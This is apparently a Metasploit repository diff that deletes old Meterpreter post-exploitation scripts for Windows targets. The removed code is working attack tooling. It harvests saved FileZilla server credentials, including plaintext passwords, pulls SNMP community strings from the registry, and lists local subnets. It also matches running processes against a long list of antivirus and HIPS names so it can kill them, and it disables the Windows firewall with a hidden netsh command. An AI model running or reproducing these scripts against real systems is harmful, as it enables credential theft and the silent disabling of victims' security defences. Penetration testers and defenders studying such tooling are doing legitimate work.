-  print_line("\n" + tbl.to_s + "\n")
54
-end
55
-
56
-opts.parse(args) { |opt, idx, val|
57
-  case opt
58
-  when "-h"
59
-    print_line "Meterpreter Script for extracting a list installed applications and their version."
60
-    print_line(opts.usage)
61
-    raise Rex::Script::Completed
62
-
63
-  end
64
-}
65
-if client.platform =~ /win32|win64/
66
-  app_list
67
-else
68
-  print_error("This version of Meterpreter is not supported with this Script!")
69
-  raise Rex::Script::Completed
70
-end

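--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -1,177 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-require "rexml/document"
-
-#-------------------------------------------------------------------------------
-#Options and Option Parsing
-opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu." ],
-  "-c" => [ false, "Return credentials." ]
-)
-
-get_credentials=false
-
-opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    print_line "Meterpreter Script for extracting servers and credentials from Filezilla."
-    print_line(opts.usage)
-    raise Rex::Script::Completed
-  when "-c"
-    get_credentials=true
-  end
-}
-### If we get here and have none of our flags true, then we'll just
-###   get credentials
-if !(get_credentials)
-  get_credentials=true
-end
-
-#-------------------------------------------------------------------------------
-#Set General Variables used in the script
-@client = client
-os = @client.sys.config.sysinfo['OS']
-host = @client.sys.config.sysinfo['Computer']
-# Create Filename info to be appended to downloaded files
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-# Create a directory for the logs
-logs = ::File.join(Msf::Config.log_directory, 'filezilla', Rex::FileUtils.clean_path(host + filenameinfo) )
-# Create the log directory
-::FileUtils.mkdir_p(logs)
-#logfile name
-dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
-
-#-------------------------------------------------------------------------------
-#function for checking of FileZilla profile is present
-def check_filezilla(path)
-  found = nil
-  @client.fs.dir.foreach(path) do |x|
-    next if x =~ /^(\.|\.\.)$/
-    if x =~ (/FileZilla/)
-      ### If we find the path, let's return it
-      found = path + x
-      return found
-    end
-  end
-  return found
-end
-
-#-------------------------------------------------------------------------------
-
-def extract_saved_creds(path,xml_file)
-  accounts_xml = ""
-  creds = ""
-  print_status("Reading #{xml_file} file...")
-  ### modified to use pidgin_path, which already has .purple in it
-  account_file = @client.fs.file.new(path + "\\#{xml_file}", "rb")
-  until account_file.eof?
-    accounts_xml << account_file.read
-  end
-  account_file.close
-  doc = (REXML::Document.new accounts_xml).root
-  doc.elements.to_a("//Server").each do |e|
-    print_status "\tHost: #{e.elements["Host"].text}"
-    creds << "Host: #{e.elements["Host"].text}"
-    print_status "\tPort: #{e.elements["Port"].text}"
-    creds << "Port: #{e.elements["Port"].text}"
-    logon_type = e.elements["Logontype"].text
-    if logon_type == "0"
-      print_status "\tLogon Type: Anonymous"
-      creds << "Logon Type: Anonymous"
-    elsif logon_type =~ /1|4/
-      print_status "\tUser: #{e.elements["User"].text}"
-      creds << "User: #{e.elements["User"].text}"
-      print_status "\tPassword: #{e.elements["Pass"].text}"
-      creds << "Password: #{e.elements["Pass"].text}"
-    elsif logon_type =~ /2|3/
-      print_status "\tUser: #{e.elements["User"].text}"
-      creds << "User: #{e.elements["User"].text}"
-    end
-
-    proto = e.elements["Protocol"].text
-    if  proto == "0"
-      print_status "\tProtocol: FTP"
-      creds << "Protocol: FTP"
-    elsif proto == "1"
-      print_status "\tProtocol: SSH"
-      creds << "Protocol: SSH"
-    elsif proto == "3"
-      print_status "\tProtocol: FTPS"
-      creds << "Protocol: FTPS"
-    elsif proto == "4"
-      print_status "\tProtocol: FTPES"
-      creds << "Protocol: FTPES"
-    end
-    print_status ""
-    creds << ""
-
-  end
-#
-  return creds
-end
-#-------------------------------------------------------------------------------
-#Function to enumerate the users if running as SYSTEM
-def enum_users(os)
-  users = []
-
-  path4users = ""
-  sysdrv = @client.sys.config.getenv('SystemDrive')
-
-  if os =~ /7|Vista|2008/
-    path4users = sysdrv + "\\users\\"
-    path2purple = "\\AppData\\Roaming\\"
-  else
-    path4users = sysdrv + "\\Documents and Settings\\"
-    path2purple = "\\Application Data\\"
-  end
-
-  if is_system?
-    print_status("Running as SYSTEM extracting user list..")
-    @client.fs.dir.foreach(path4users) do |u|
-      userinfo = {}
-      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
-      userinfo['username'] = u
-      userinfo['userappdata'] = path4users + u + path2purple
-      users << userinfo
-    end
-  else
-    userinfo = {}
-    uservar = @client.sys.config.getenv('USERNAME')
-    userinfo['username'] = uservar
-    userinfo['userappdata'] = path4users + uservar + path2purple
-    users << userinfo
-  end
-  return users
-end
-
-################## MAIN ##################
-if client.platform =~ /win32|win64/
-  print_status("Running Meterpreter FileZilla Credential harvester script")
-  print_status("All services are logged at #{dest}")
-  enum_users(os).each do |u|
-    print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
-    ### Find the path (if it exists) for this user,
-    filezilla_path = check_filezilla(u['userappdata'])
-    if filezilla_path
-      print_status("FileZilla profile found!")
-      ### modified to use filezilla_path
-      xml_cfg_files = ['sitemanager.xml','recentservers.xml']
-      if get_credentials
-        xml_cfg_files.each do |xml_cfg_file|
-          file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
-        end
-      end
-
-    else
-      print_error("Filezilla profile not found!")
-    end
-  end
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end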
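--- a/scripts/meterpreter/get_local_subnets.rb
+++ b/scripts/meterpreter/get_local_subnets.rb
@@ -1,35 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Meterpreter script that display local subnets
-# Provided by Nicob <nicob [at] nicob.net>
-# Ripped from http://blog.metasploit.com/2006/10/meterpreter-scripts-and-msrt.html
-
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu." ]
-)
-def usage
-  print_line("Get a list of local subnets based on the host's routes")
-  print_line("USAGE: run get_local_subnets")
-  print_line(@@exec_opts.usage)
-  raise Rex::Script::Completed
-end
-
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    usage
-  end
-}
-
-client.net.config.each_route { |route|
-  # Remove multicast and loopback interfaces
-  next if route.subnet =~ /^(224\.|127\.)/
-  next if route.subnet == '0.0.0.0'
-  next if route.netmask == '255.255.255.255'
-  print_line("Local subnet: #{route.subnet}/#{route.netmask}")
-}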
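--- a/scripts/meterpreter/get_valid_community.rb
+++ b/scripts/meterpreter/get_valid_community.rb
@@ -1,64 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#copied getvncpw - thanks grutz/carlos
-
-session = client
-
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu."]
-)
-
-def usage()
-  print("\nPull the SNMP community string from a Windows Meterpreter session\n\n")
-  completed
-end
-
-def get_community(session)
-  key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
-  root_key, base_key = session.sys.registry.splitkey(key)
-  open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
-  begin
-    # oddly enough this does not return the data field which indicates ro/rw
-    return open_key.enum_value.collect {|x| x.name}
-  rescue
-    # no registry key found or other error
-    return nil
-  end
-end
-
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    usage
-  end
-}
-
-if client.platform =~ /win32|win64/
-  print_status("Searching for community strings...")
-  strs = get_community(session)
-  if strs
-    strs.each do |str|
-      print_good("FOUND: #{str}")
-      @client.framework.db.report_auth_info(
-        :host	=> client.sock.peerhost,
-        :port	=> 161,
-        :proto	=> 'udp',
-        :sname	=> 'snmp',
-        :user	=> '',
-        :pass	=> str,
-        :type	=> "snmp.community",
-        :duplicate_ok	=> true
-      )
-    end
-  else
-    print_status("Not found")
-  end
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end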
scripts/meterpreter/getcountermeasure.rb View File

@@ -1,381 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
10
-# Provides also the option to kill the processes of detected products and disable the built-in firewall.
11
-# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
12
-# Version: 0.1.0
13
-session = client
14
-@@exec_opts = Rex::Parser::Arguments.new(
15
-  "-h" => [ false, "Help menu." ],
16
-  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
17
-  "-d" => [ false, "Disable built in Firewall" ]
18
-)
19
-
20
-def usage
21
-  print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV")
22
-  print_line("processes, show XP firewall rules, and display DEP and UAC")
23
-  print_line("policies")
24
-  print(@@exec_opts.usage)
25
-  raise Rex::Script::Completed
26
-end
27
-
28
-#-------------------------------------------------------------------------------
29
-avs = %W{
30
-  a2adguard.exe
31
-  a2adwizard.exe
32
-  a2antidialer.exe
33
-  a2cfg.exe
34
-  a2cmd.exe
35
-  a2free.exe
36
-  a2guard.exe
37
-  a2hijackfree.exe
38
-  a2scan.exe
39
-  a2service.exe
40
-  a2start.exe
41
-  a2sys.exe
42
-  a2upd.exe
43
-  aavgapi.exe
44
-  aawservice.exe
45
-  aawtray.exe
46
-  ad-aware.exe
47
-  ad-watch.exe
48
-  alescan.exe
49
-  anvir.exe
50
-  ashdisp.exe
51
-  ashmaisv.exe
52
-  ashserv.exe
53
-  ashwebsv.exe
54
-  aswupdsv.exe
55
-  atrack.exe
56
-  avgagent.exe
57
-  avgamsvr.exe
58
-  avgcc.exe
59
-  avgctrl.exe
60
-  avgemc.exe
61
-  avgnt.exe
62
-  avgtcpsv.exe
63
-  avguard.exe
64
-  avgupsvc.exe
65
-  avgw.exe
66
-  avkbar.exe
67
-  avk.exe
68
-  avkpop.exe
69
-  avkproxy.exe
70
-  avkservice.exe
71
-  avktray
72
-  avktray.exe
73
-  avkwctl
74
-  avkwctl.exe
75
-  avmailc.exe
76
-  avp.exe
77
-  avpm.exe
78
-  avpmwrap.exe
79
-  avsched32.exe
80
-  avwebgrd.exe
81
-  avwin.exe
82
-  avwupsrv.exe
83
-  avz.exe
84
-  bdagent.exe
85
-  bdmcon.exe
86
-  bdnagent.exe
87
-  bdss.exe
88
-  bdswitch.exe
89
-  blackd.exe
90
-  blackice.exe
91
-  blink.exe
92
-  boc412.exe
93
-  boc425.exe
94
-  bocore.exe
95
-  bootwarn.exe
96
-  cavrid.exe
97
-  cavtray.exe
98
-  ccapp.exe
99
-  ccevtmgr.exe
100
-  ccimscan.exe
101
-  ccproxy.exe
102
-  ccpwdsvc.exe
103
-  ccpxysvc.exe
104
-  ccsetmgr.exe
105
-  cfgwiz.exe
106
-  cfp.exe
107
-  clamd.exe
108
-  clamservice.exe
109
-  clamtray.exe
110
-  cmdagent.exe
111
-  cpd.exe
112
-  cpf.exe
113
-  csinsmnt.exe
114
-  dcsuserprot.exe
115
-  defensewall.exe
116
-  defensewall_serv.exe
117
-  defwatch.exe
118
-  f-agnt95.exe
119
-  fpavupdm.exe
120
-  f-prot95.exe
121
-  f-prot.exe
122
-  fprot.exe
123
-  fsaua.exe
124
-  fsav32.exe
125
-  f-sched.exe
126
-  fsdfwd.exe
127
-  fsm32.exe
128
-  fsma32.exe
129
-  fssm32.exe
130
-  f-stopw.exe
131
-  f-stopw.exe
132
-  fwservice.exe
133
-  fwsrv.exe
134
-  iamstats.exe
135
-  iao.exe
136
-  icload95.exe
137
-  icmon.exe
138
-  idsinst.exe
139
-  idslu.exe
140
-  inetupd.exe
141
-  irsetup.exe
142
-  isafe.exe
143
-  isignup.exe
144
-  issvc.exe
145
-  kav.exe
146
-  kavss.exe
147
-  kavsvc.exe
148
-  klswd.exe
149
-  kpf4gui.exe
150
-  kpf4ss.exe
151
-  livesrv.exe
152
-  lpfw.exe
153
-  mcagent.exe
154
-  mcdetect.exe
155
-  mcmnhdlr.exe
156
-  mcrdsvc.exe
157
-  mcshield.exe
158
-  mctskshd.exe
159
-  mcvsshld.exe
160
-  mghtml.exe
161
-  mpftray.exe
162
-  msascui.exe
163
-  mscifapp.exe
164
-  msfwsvc.exe
165
-  msgsys.exe
166
-  msssrv.exe
167
-  navapsvc.exe
168
-  navapw32.exe
169
-  navlogon.dll
170
-  navstub.exe
171
-  navw32.exe
172
-  nisemsvr.exe
173
-  nisum.exe
174
-  nmain.exe
175
-  noads.exe
176
-  nod32krn.exe
177
-  nod32kui.exe
178
-  nod32ra.exe
179
-  npfmntor.exe
180
-  nprotect.exe
181
-  nsmdtr.exe
182
-  oasclnt.exe
183
-  ofcdog.exe
184
-  opscan.exe
185
-  ossec-agent.exe
186
-  outpost.exe
187
-  paamsrv.exe
188
-  pavfnsvr.exe
189
-  pcclient.exe
190
-  pccpfw.exe
191
-  pccwin98.exe
192
-  persfw.exe
193
-  protector.exe
194
-  qconsole.exe
195
-  qdcsfs.exe
196
-  rtvscan.exe
197
-  sadblock.exe
198
-  safe.exe
199
-  sandboxieserver.exe
200
-  savscan.exe
201
-  sbiectrl.exe
202
-  sbiesvc.exe
203
-  sbserv.exe
204
-  scfservice.exe
205
-  sched.exe
206
-  schedm.exe
207
-  scheduler daemon.exe
208
-  sdhelp.exe
209
-  serv95.exe
210
-  sgbhp.exe
211
-  sgmain.exe
212
-  slee503.exe
213
-  smartfix.exe
214
-  smc.exe
215
-  snoopfreesvc.exe
216
-  snoopfreeui.exe
217
-  spbbcsvc.exe
218
-  sp_rsser.exe
219
-  spyblocker.exe
220
-  spybotsd.exe
221
-  spysweeper.exe
222
-  spysweeperui.exe
223
-  spywareguard.dll
224
-  spywareterminatorshield.exe
225
-  ssu.exe
226
-  steganos5.exe
227
-  stinger.exe
228
-  swdoctor.exe
229
-  swupdate.exe
230
-  symlcsvc.exe
231
-  symundo.exe
232
-  symwsc.exe
233
-  symwscno.exe
234
-  tcguard.exe
235
-  tds2-98.exe
236
-  tds-3.exe
237
-  teatimer.exe
238
-  tgbbob.exe
239
-  tgbstarter.exe
240
-  tsatudt.exe
241
-  umxagent.exe
242
-  umxcfg.exe
243
-  umxfwhlp.exe
244
-  umxlu.exe
245
-  umxpol.exe
246
-  umxtray.exe
247
-  usrprmpt.exe
248
-  vetmsg9x.exe
249
-  vetmsg.exe
250
-  vptray.exe
251
-  vsaccess.exe
252
-  vsserv.exe
253
-  wcantispy.exe
254
-  win-bugsfix.exe
255
-  winpatrol.exe
256
-  winpatrolex.exe
257
-  wrsssdk.exe
258
-  xcommsvr.exe
259
-  xfr.exe
260
-  xp-antispy.exe
261
-  zegarynka.exe
262
-  zlclient.exe
263
-}
264
-#-------------------------------------------------------------------------------
265
-# Check for the presence of AV, HIPS and Third Party firewall and/or kill the
266
-# processes associated with it
267
-def check(session,avs,killbit)
268
-  print_status("Checking for contermeasures...")
269
-  session.sys.process.get_processes().each do |x|
270
-    if (avs.index(x['name'].downcase))
271
-      print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
272
-      if (killbit)
273
-        print_status("\tKilling process for countermeasure.....")
274
-        session.sys.process.kill(x['pid'])
275
-      end
276
-    end
277
-  end
278
-end
279
-#-------------------------------------------------------------------------------
280
-# Get the configuration and/or disable the built in Windows Firewall
281
-def checklocalfw(session,killfw)
282
-  print_status("Getting Windows Built in Firewall configuration...")
283
-  opmode = ""
284
-  r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
285
-  while(d = r.channel.read)
286
-    opmode << d
287
-  end
288
-  r.channel.close
289
-  r.close
290
-  opmode.split("\n").each do |o|
291
-    print_status("\t#{o}")
292
-  end
293
-  if (killfw)
294
-    print_status("Disabling Built in Firewall.....")
295
-    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
296
-    while(d = f.channel.read)
297
-      if d =~ /The requested operation requires elevation./
298
-        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
299
-      end
300
-    end
301
-    f.channel.close
302
-    f.close
303
-  end
304
-end
305
-#-------------------------------------------------------------------------------
306
-# Function for getting the current DEP Policy on the Windows Target
307
-def checkdep(session)
308
-  tmpout = ""
309
-  depmode = ""
310
-  # Expand environment %TEMP% variable
311
-  tmp = session.sys.config.getenv('TEMP')
312
-  # Create random name for the wmic output
313
-  wmicfile = sprintf("%.5d",rand(100000))
314
-  wmicout = "#{tmp}\\#{wmicfile}"
315
-  print_status("Checking DEP Support Policy...")
316
-  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
317
-  sleep(2)
318
-  r.close
319
-  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
320
-    while(d = r.channel.read)
321
-      tmpout << d
322
-    end
323
-  r.channel.close
324
-  r.close
325
-  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
326
-  depmode = tmpout.scan(/(\d)/)
327
-  if depmode.to_s == "0"
328
-    print_status("\tDEP is off for the whole system.")
329
-  elsif depmode.to_s == "1"
330
-    print_status("\tFull DEP coverage for the whole system with no exceptions.")
331
-  elsif depmode.to_s == "2"
332
-    print_status("\tDEP is limited to Windows system binaries.")
333
-  elsif depmode.to_s == "3"
334
-    print_status("\tDEP is on for all programs and services.")
335
-  end
336
-
337
-end
338
-#-------------------------------------------------------------------------------
339
-def checkuac(session)
340
-  print_status("Checking if UAC is enabled ...")
341
-  key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
342
-  root_key, base_key = session.sys.registry.splitkey(key)
343
-  value = "EnableLUA"
344
-  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
345
-  v = open_key.query_value(value)
346
-  if v.data == 1
347
-    print_status("\tUAC is Enabled")
348
-  else
349
-    print_status("\tUAC is Disabled")
350
-  end
351
-end
352